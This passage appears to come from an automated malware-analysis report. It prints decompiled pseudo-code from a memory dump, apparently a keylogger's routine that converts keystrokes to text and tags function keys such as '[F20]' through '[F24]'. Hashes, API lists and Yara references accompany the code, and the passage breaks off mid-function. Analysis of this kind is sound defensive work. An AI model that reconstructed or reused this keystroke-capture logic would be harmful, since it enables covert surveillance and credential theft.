Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F2]
API String ID: 783433895-219715840
Opcode ID: bc4e0beed6f5971c97352df3017e66fb88d969414a5b5ea74617967ef4fb9ef4
Instruction ID: b16667c500a8f6aee4ba6b3ba7482377eae1e2be3dd1480aee087fcb1cdc840b
Opcode Fuzzy Hash: bc4e0beed6f5971c97352df3017e66fb88d969414a5b5ea74617967ef4fb9ef4
Instruction Fuzzy Hash: D931C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007464, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007464(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F20]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007464
0x10007464
0x1000746b
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[F20], xrefs: 10007466

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F20]
API String ID: 783433895-394710967
Opcode ID: 6d471ac1e053abb11c3b1d7b11cba9aa75bbbea4d48d7b348b99f179170ee903
Instruction ID: a680e9b239fa0aebbd035ce6a985e10c990f55e2f26307f0e1286ccc6e1c0c6e
Opcode Fuzzy Hash: 6d471ac1e053abb11c3b1d7b11cba9aa75bbbea4d48d7b348b99f179170ee903
Instruction Fuzzy Hash: D331C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F6489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007475, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007475(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F21]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007475
0x10007475
0x1000747c
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[F21], xrefs: 10007477

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F21]
API String ID: 783433895-245235446
Opcode ID: a583e5d24fb749a61087f2418aa3365330e5370283494b596e987e39d4a65dac
Instruction ID: 510fef3e6fa0df149ae542c76aa25a181dcf5755431cbbb85e5b1cc66d8b058e
Opcode Fuzzy Hash: a583e5d24fb749a61087f2418aa3365330e5370283494b596e987e39d4a65dac
Instruction Fuzzy Hash: A131BEB8B042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE458B61

Uniqueness

Uniqueness Score: -1.00%

Function 10007486, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007486(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F22]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007486
0x10007486
0x1000748d
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[F22], xrefs: 10007488

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F22]
API String ID: 783433895-632335669
Opcode ID: 538fe9a1677a7cf68954d1a7aa096ae76dd59aeb88e8845f61bacfcf84bd100c
Instruction ID: 90321dbe446a42362a2d965519f54d3763325675bd58b520da20de7a1a4fc573
Opcode Fuzzy Hash: 538fe9a1677a7cf68954d1a7aa096ae76dd59aeb88e8845f61bacfcf84bd100c
Instruction Fuzzy Hash: 0931C0B8F042545BF722CB658C85B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10007497, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007497(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F23]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x10007497
0x10007497
0x1000749e
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[F23], xrefs: 10007499

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F23]
API String ID: 783433895-1017879668
Opcode ID: ef35aa9342167d40ef5d6cda57461785793fe1f05099ee63a642656f0a901aee
Instruction ID: 28673ba874af58d34bd6c2be020580e78fa885bb135c4682ba041cb78c112e65
Opcode Fuzzy Hash: ef35aa9342167d40ef5d6cda57461785793fe1f05099ee63a642656f0a901aee
Instruction Fuzzy Hash: 3631C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100074A8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100074A8(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F24]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100074a8
0x100074a8
0x100074af
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[F24], xrefs: 100074AA

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[F24]
API String ID: 783433895-1944718003
Opcode ID: 665d1b7efd069a3ae324f5ec22a3b3878916ac6c883f3f9a389a2f470a77c692
Instruction ID: c4be0e32e04de120a2cca3183412b642890461deb7d46080007a753c2659c191
Opcode Fuzzy Hash: 665d1b7efd069a3ae324f5ec22a3b3878916ac6c883f3f9a389a2f470a77c692
Instruction Fuzzy Hash: 7C31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100074B9, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100074B9(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[F3]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
